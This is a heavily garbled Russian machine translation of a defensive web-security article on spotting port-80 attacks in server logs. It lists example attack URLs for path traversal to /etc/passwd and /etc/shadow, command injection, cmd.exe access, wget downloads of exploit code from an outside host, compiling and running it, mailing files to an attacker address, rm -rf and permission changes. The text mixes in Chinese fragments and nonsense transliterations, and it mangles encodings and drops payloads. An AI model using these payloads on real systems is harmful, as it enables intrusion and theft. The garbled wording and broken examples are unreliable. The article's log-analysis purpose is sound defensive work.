I. Резюме
II. Подробное описание
III. Дальнейшая
IV. Превентивной Анализ
В. транскодирования
VI. Заключение
[Аннотация]
веб-сайт 80 как порт службы по умолчанию, различных вопросов безопасности на рулоны Buduan's Out, недостатки в некоторых даже быть использовано для усиления административных привилегий 进入 в рамках одного узла, следующие да Zenomorph 80 Duankou некоторые следы нападения Fang Ши исследований, и рассказать вам, как найти проблемы с записей журнала.
[Подробнее]
В следующем разделе с помощью ряда Ли Цзы, и его отображение на веб-приложения на сервере генеральное наступление, и ее следы, которые представляют собой лишь Liezi крупное наступление, у нас нет списка всех форм нападения, в этом разделе подробное описание роли каждой атаки, и его как можно использовать эту уязвимость для атаки.
(1) "." ".." И "..." запрос
Следы этих атак очень распространены для веб-приложений и веб-сервер, который используется для разрешения атакующий или червь-вирус программа для изменения пути веб-сервера, чтобы получить доступ к закрытой области. Большинство CGI программ с этими недостатками, ".." запрос.
Пример:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Это свидетельствует о просьбе злоумышленника Liezi mosd этот файл, если атакующий веб-сервера возможность прорыва корневой каталог, а затем получить дополнительную информацию и получить дополнительные привилегии.
(2) "20%" запрос
20% шестнадцатиричное значение, что 16 пространств, хотя это не означает, что вы можете использовать что угодно, но, когда вы просматриваете журнал будет найти его, некоторые веб-приложения сервер, работающий на этот символ может быть эффективно реализован Поэтому вы должны тщательно рассмотреть журнала. С другой стороны, запрос может иногда выполнять некоторые команды.
Пример:
http://host/cgi-bin/lame.cgi?page=ls% 20-аль |
Ле-шоу нападения выполнять UNIX-команды, перечисляя весь каталог файлов, просила, в результате чего злоумышленник для доступа к важным файлам в вашей системе, чтобы помочь ему получить привилегии Tigongtiaojian.
(3) "% 00" запрос
00% говорит 16-разрядный шестнадцатеричный пустой, он был в состоянии дурачить веб-приложений, а также просьбы различных типов файлов.
Примеры:
http://host/cgi-bin/lame.cgi?page=index.html
Это может быть корректным запросом в машине, если злоумышленник известно об этой просьбе было успешным, он будет и далее искать CGI-процедур.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Может быть, CGI-программа не принять этот запрос, поскольку он является просьбой проверить файл суффикс, например: html.shtml или другие типы файлов. Большинство программ, скажу вам требуемый файл типа является недействительным, на этот раз будет говорить злоумышленник просит файл должен быть характер расширению файла типа, поэтому злоумышленник может получить системный путь, имя файла, в результате чего вашу систему более чувствительной информации
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd 00html%
Внимание на эту просьбу, он будет обманывать CGI-программы, что этот документ должен определить приемлемые типы файлов, некоторые приложения эффективных инспекций, как глупый файл запроса, который обычно используется методы злоумышленника.
(4) "|" запрос
Это трубы характера, в UNIX-системы, просьбы о помощи в реализации ряда системных команд одновременно.
Пример:
# Cat access_log | Grep-я ".."
(Эта команда покажет войти в ".." запрос, обычно используемые в нападениях и червей)
Часто считают, что многие веб-приложений использовать этот символ, это также приводит к ложным тревогам в IDS журналов.
В тщательного рассмотрения Вашей заявки, с тем преимуществом сокращения ложных тревог в системах обнаружения вторжений.
Вот некоторые из Ле-цзы:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Этот запрос команды, следующие изменения в Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-аль% 20/etc |
Этот запрос, перечисленных в UNIX-системы / и т.д. каталог всех файлов
http://host/cgi-bin/lame.cgi?page=cat 20access_log% |% Grep 20-я 20% "хромой"
Выполнение кот просьбе командования и реализации Grep команда будет также проверить "хромой"
(5) "," запрос
В Unix системах это символ позволяет нескольким исполнения командной строки
Пример:
# Id; UNAME-
(Осуществление идентификатор команды, после осуществления UNAME команда)
Некоторые веб-программы с этим характер, может повлечь за собой IDS журналы предупреждения отказов, вы должны тщательно проверить ваш веб-программы, так что вам уменьшить риск неудачи предупреждений IDS.
(6) " " и " " Запрос
Если проверить журналы записи 2 символов ряду причин, первая из них характер, что дополнительные данные в документе
Пример 1:
# Эхо "Ваше hax0red H0 H0" / и т.д. / MOTD (MOTD просьбе письменной информации, в этом документе)
Злоумышленник может легко использовать запрос, как указано выше фальсификации веб-страницы. Такие, как знаменитый RDS использовать злоумышленник часто используется для изменения веб-страницы.
Пример 2:
http://host/something.php=Hi 20mom%%% 20Im 20Bold!
Сайтов можно заметить, что на языке знаков здесь, он также провел " "," " символы, такие атаки не может привести к злоумышленнику доступ к системе, то люди путают думаю, что это законные информации веб-сайта (что приводит к Люди посетить эту ссылку для перехода к злоумышленнику установить адрес, этот запрос может быть закодирован в 16 шестнадцатеричных символа в виде, так что следы атаки это не так очевидно)
(7) "!" Запрос
Общий язык на эту просьбу характер СС (Server Side Include) Я нападения, если атакующий злоумышленник путать пользователь кликает по ссылке набор, и то же, что и выше.
Пример:
http://host1/something.php =
Ле-цзы является злоумышленник может сделать это в файл на сайт с host1 host2 появляется выше (разумеется, потребует посетители на связи злоумышленника настроек. Этот запрос может быть преобразован в 16 шестнадцатеричной кодировке маска, не так легко найти)
В то же время, этот подход может также выполнять веб-сайт и власть
Пример:
http://host/something.php =
Ле-запустить на удаленной системе "ID" команду, то появится идентификатор пользователя, веб-сайта, как правило, "никто" или "WWW"
Эта форма также позволяет включить скрытые файлы.
Пример:
http://host/something.php =
Скрытые файлы. Htpasswd не будет отображаться, Apache откажется установить такие правила. Ht форму запроса, и SSI логотип будет обходить эти ограничения, и привести к проблемам безопасности
(8) "," Запрос
Такие атаки используются для удаленного попытка вставить PHP процедур веб-приложения, он может позволить выполнение заказа, в зависимости от настроек сервера и других факторов на рабочих местах (таких, как PHP установлен в безопасном режиме)
Пример: http://host/something.php = passthru ("идентификатор ");?
В некоторых простого приложения PHP, это может быть на веб-сайт на удаленной системе права пользователей для выполнения местной командой
(9) "` "запрос
Этот символ впоследствии использовались для выполнения команд в Perl, символов в веб-приложении используется не часто, так что если вы видите его в журнале, должны быть очень осторожны
Пример:
http://host/something.cgi ID = ``
Создать Perl CGI программы в вопросе приведет к реализации идентификатор команды
[Далее]
В следующем разделе будет обсуждаться применение более нападения могут команды, вместе с документами, просил, и если у вас недостаток удаленного выполнения команд, он должен быть, как проверить открытие. Эта часть просто чтобы дать вам хорошей идеей, и сказать системе, что происходит, злоумышленники попытаются напасть на следы вашей системы, но не список всех злоумышленнику использовать команды и запросы.
"/ Bin / LS"
Эта команда просит весь путь, во многих веб-приложения эту лазейку, если войти в многих местах с такой просьбой, это возможно для крупных удаленных уязвимости выполнения команд, но не обязательно является проблемой также может быть ложной тревоги. Снова напомнил, веб-приложение, написанное (CGI, ASP, PHP ... и т.д.) является основой безопасности
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-аль |
http://host/cgi-bin/bad.cgi?doh=ls% 20-др.;
"Cmd.exe"
Это окно оболочки, если злоумышленнику получить доступ и запускать этот скрипт в настройках сервера в соответствии с условиями позволило в машине окна можно делать что угодно, много червей через порт 80, коммуникации к удаленному компьютеру
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / идентификатором"
Это два бинарных файлов, ее проблемы и / бен / LS, как, если войти в многих местах с такой просьбой, это возможно для крупных удаленных уязвимости выполнения команд, но не обязательно является проблемой также может быть ложной тревоги.
Он покажет, какая часть, к которой принадлежит пользователю и группе
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / RM"
Эта команда может удалять файлы без правильного использования очень опасно
Примеры:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-20% ВЧ * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-20 ВЧ% *;
"Wget и TFTP команду
Эти команды часто злоумышленник может получить дополнительные привилегии для загрузки файлов, Wget является UNIX-команды под землей, могут быть использованы для загрузки бэкдоры, TFTP находится под UNIX-команды и NT, используется, чтобы загрузить файл. Некоторые IIS черви распространяются сами по TFTP скопировать вируса на другие узлы
Примеры:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget 20http%: / / host2/Phantasmp.c | http:// хост / CGI-BIN / bad.cgi? МЗ = Wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Кошка" команды
Эта команда используется для просмотра содержимого файла, используется для чтения важную информацию, такую как файлы конфигурации, файлы с паролями, кредитные файлы и документы, вы можете думать о
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? МЗ = кот 20/etc/motd%;
"Эхо" команды
Эта команда используется для записи данных в файл, например "index.html"
Примеры: 20% http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo "ФК-киви #%% 20was 20here"% 20 % | 200day.txt http://host/cgi-bin/bad.cgi?doh=echo 20% "ФК-киви #%% 20was 20here"% 20 200day.txt%;
"П" команды
Списки в настоящее время работающий процесс, сказать, что злоумышленнику удаленный компьютер работает программное обеспечение, чтобы получить некоторое представление о вопросах безопасности, для получения дополнительной разрешения
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-Окс | http://host/cgi-bin/bad. CGI? DOH пс =% 20-Окс;
"Kill и Killall команду
Unix системы, чтобы убить этот процесс, злоумышленник может использовать эту команду для остановки системных сервисов и процессов может также стереть следы злоумышленника, некоторые подвиг будет производить много дочерних процессов
Примеры: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill 20% -9% 200;
"Uname команду
Эта команда заставляет атакующего имя удаленной машины, на некоторое время, через этот сайт, чтобы узнать, какой провайдер, злоумышленник, который может быть посетил сегодня. Uname-запроса обычно, они будут записаны в лог-файл
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-| http://host/cgi-bin/bad. CGI? DOH UNAME =% 20-а;
"Копия", GCC, Perl, Python, и т.д. ... "компиляции / интерпретации команды
Атакующий через TFTP или Wget скачать использовать, и использовать куб.см, компилятор GCC для компиляции это в исполняемые программы, а также дополнительные привилегии доступа
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. CGI? МЗ = дсс% 20Phantasmp.c;. / a.out% 20-р% 2031337;
Если Вы просмотрите журналы найти в "Perl" питон "Эти инструкции могут быть удаленному злоумышленнику загрузить Perl, Python скрипт, и пытался получить привилегии местных
"Почта" команды
Злоумышленники часто используют эту команду системы, некоторые важные документы почтовый ящик злоумышленника, но и готовы к электронной почте взрывы осуществляются
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org 20%
2.168.22.1;
"Чаун, CHMOD, chgrp, CHSH, и т.д. ..." и другие команды
Unix систем, с тем чтобы они могли изменить права доступа к файлам
Чаун = позволяет установить владельца файла CHMOD = позволяет установить файл chgrp разрешения = дает владельцу возможность изменять права доступа для групп файлов CHSH = позволило изменить оболочку пользователя
Примеры: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH CHMOD =% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno 20% / и т.д. / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / BIN / chgrp% 20nobody% 20/etc/shadow |
"/ И т.д. / пароль" файл
Это пароль системными файлами, как правило, тени отключены, и не позволяет увидеть зашифрованный пароль, но и для потенциального взломщика, который может знать, что является действительным пользователем, и абсолютный путь системы, название сайта и другую информацию, как это обычно в тени отключены, так что злоумышленник, как правило, см. / и т.д. / тень файл
"/ Etc / master.passwd"
Этот файл пароля BSD файловых систем, содержит зашифрованный пароль, файл в корневом каталоге счет только для чтения, а некоторые неквалифицированные нападавшие открыли его попытка прочитать содержимое внутрь., Если веб-сайт привилегий для запуска, а затем на злоумышленника, который может читать содержимое системного администратора много проблем придет один за другим
"/ ETC / тень"
Содержит пароль зашифрованные системы, читать же по учетной записи суперпользователя, и / е / master.passwd почти
"/ ETC / MOTD"
Когда пользователи входят в UNIX-системы, есть информация в разделе "Сообщение дня" файл, он предоставляет важную системную информацию и администратор пользователем количество настроек, те, кто хочет, чтобы пользователи, кто не является, также содержит информацию о версии системного, злоумышленник обычно видят этот файл, чтобы понять, что система работает на злоумышленника, то следующий шаг заключается в поиске такого рода системы, использовать и более широкий доступ к системе привилегий
"/ ETC / хосты"
В этом документе содержится IP-адреса и сети, злоумышленник может получить дополнительную информацию о сети системы настройки
"/ USR / местные / Apache / Conf / httpd.conf"
Это сервер Apache веб конфигурационный файл, атакующий может понять, например, CGI, SSI и другая информация доступна
"/ ETC / inetd.conf"
Это файл конфигурации INETD службы, злоумышленник может узнать удаленной машине, начала этих услуг, следует ли использовать оболочку для управления доступом, если оболочка была запущена, злоумышленник Следующим шагом будет проверка "/ и т.д. / hosts.allow" и "/ и т.д. / hosts.deny", файл, и которые могут изменять некоторые настройки, права доступа
". Htpasswd. Htaccess, и. Htgroup"
Эти файлы, как правило, используемые в веб-аутентификации пользователей сайта, злоумышленник должен просмотреть эти файлы и получить имя пользователя и пароль, файл с паролями. Htpasswd в зашифрованном виде, прорваться через простой процесс расшифровки, позволяет злоумышленнику получить доступ к сайту охраняемых территорий (как правило, пользователь с таким же именем пользователя и паролем, злоумышленник может даже посещать другие счета)
"Access_log и error_log"
Эти файлы сервера Apache журнала, злоумышленники часто рассматривают эти файлы, смотреть на эти запросы регистрируются эти и другие запросы для разных местах
Как правило, злоумышленник будет изменить эти лог-файлы, например, собственной информации адрес, злоумышленник прорваться 80 портов в вашей системе, а резервная система также не работает, нет никаких других программ, записывающих 状况 системы, которая будет обнаружения вторжения становится очень трудно работать
"[Буква диска]: winntrepairsam._ или [Буква диска]: winntrepairsam"
Windows NT система файле паролей, если удаленные команды не могут быть реализованы, злоумышленники, как правило, запрос этих документов, а затем "l0pht крэк" типа для взламывания паролей инструментов взломать, если злоумышленник попытается напасть на файл паролей администратора, если успешным, то на удаленной машине будет злоумышленник получает контроль
[Переполнения анализа]
В этой статье я не буду говорить слишком много о переполнении этой темы, я буду раздавать то, что эти явления и следы заслуживает внимания и вызывает особую обеспокоенность, буфера часто имеют место случаи перехода атакующий код, и трудно найти другие пути достижения
Вот простой Ли Цзы
Пример: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA А.
Это Liezi показывает, злоумышленник на приложение для отправки много символов, чтобы проверить программу переполнение буфера, переполнение буфера, могут получить удаленный разрешения выполнения команд хозяина, если владелец имеет setuid и процедур для корневого через переполнение может получить доступ ко всей системе, если не как setuid программу, а затем переполнения только работает пользователь веб-сайта права
Здесь ситуация не может сказать все, но вы должны иметь регулярные проверки файлов журнала, если в этот день вдруг обнаружил, что многие просьбы, но обычно не более чем на просьбу, она показывает, что вы страдаете некоторыми Атаки на переполнение, конечно, может быть также Новая атака червя сети
[Транскодирования]
Все атаки упомянутых выше запрос, злоумышленник обычно знает IDS механических систем часто проверять запрос, как правило, атакующий будет использовать данные преобразования инструмент для конвертирования просила форматирования содержимого, 16 группы, в результате чего IDS будет игнорировать эти просьбы, Мы знакомы с CGI уязвимости сканирования, является хорошим Liezi усов. При просмотре журнала того времени нашли большое количество 16-полосным, а не некоторые наиболее часто встречающиеся символы, то злоумышленник может попытаться использовать некоторые атаки на вашей системе
Быстрый способ лог файл запрос для тех, кто 16 шестнадцатеричном, скопировать его в свой браузер, браузер может быть конвертированы в право просить, и отображается содержимое запроса, если вы не мужество, чтобы принять этот риск, простой человек, ASCII, может предоставить вам правильный код.
[Заключение]
Эта статья не может охватить все 80 портов нападения, но большинство из них были широко распространенные нападения перечисленных путей и рассказать вам, как проверить файлы журнала, и как добавить такие, как количество правил IDS, писать ее цель заключается в Сети системный администратор должен быть обеспокоены тем, что хорошая идея, в то же время, я надеюсь, что эта статья поможет веб-разработчикам веб-программе, писать более совершенные программы
ПРИМЕЧАНИЯ: Если у вас есть замечания или предложения, пожалуйста, отправьте по электронной почте admin@cgisecurity.com.